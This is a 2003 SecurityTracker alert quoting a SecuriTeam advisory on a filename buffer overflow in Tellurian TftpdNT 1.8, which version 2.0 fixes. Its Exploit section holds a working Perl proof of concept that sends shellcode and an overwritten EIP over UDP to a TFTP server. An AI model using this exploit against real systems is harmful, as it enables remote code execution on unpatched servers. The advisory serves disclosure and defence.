Tellurian TftpdNT Buffer Overflow Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1007582
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Aug 26 2003
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 1.8
|
Description: A buffer overflow vulnerability was reported in Tellurian TftpdNT. A remote user can execute arbitrary code on the system.
SecuriTeam reported that a remote user can specify a specially crafted filename to trigger the buffer overflow and overwrite the
EIP register, potentially executing arbitrary code.
A demonstration exploit is provided in the Source Message.
SecuriTeam
credits STORM with discovering the flaw.
|
Impact: A remote user can execute arbitrary code with the privileges of the TFTP server.
|
Solution: The vendor has released a fixed version (2.0), available at:
http://www.tellurian.com.au/products/trinkets/tftpdNT/
http://www.tellurian.com.au/products/trinkets/tftpdNT/tftpdnt_trial.exe
|
Vendor URL: www.tellurian.com.au/products/trinkets/tftpdNT/ (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: SecuriTeam <support@securiteam.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 26 Aug 2003 15:42:38 +0200
From: SecuriTeam <support@securiteam.com>
Subject: [NT] Security Vulnerability in Tellurian TftpdNT (Long Filename)
|
The following security advisory is sent to the securiteam mailing list, and can be found at the Secur
iTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Security Vulnerability in Tellurian TftpdNT (Long Filename)
------------------------------------------------------------------------
SUMMARY
<http://www.tellurian.com.au/> Tellurian TftpdNT is a TFTP server for
Windows NT and Windows 9x.
A buffer overflow vulnerability in the product allows remote attackers to
cause the product to overflow an internal buffer, while executing
arbitrary code.
DETAILS
Vulnerable systems:
* TftpdNT version 1.8
Immune systems:
* TftpdNT version 2.0
It is possible to cause a buffer overflow in the Tellurian TftpdNT
product, while overwriting the EIP pointer - this allows remote command
execution.
The overflow occurs in the product's parsing of the filename.
Vendor status:
The vendor has been informed, and has fixed the issue within 24 hours. A
new version is available on the web site.
Exploit:
#!/usr/bin/perl -w
#Tellurian TFTP Server buffer overflow vulnerability
use IO::Socket;
$host = "192.168.1.44";
$port = "69";
$shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\
\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\
\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\
\x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";
$buf = "\x00\x02";
$buf .= "\x41"x(508-length($shellcode));
$buf .= $shellcode;
$buf .= "\x0F\x02\xC7"; # EIP
$buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";
print "Length: ", length($buf), "\n";
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send:
$!\n";
print "Done\n";
ADDITIONAL INFORMATION
SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
finding this vulnerability.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu
riteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co
m
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con
sequential, loss of business
profits or special damages.
|
|
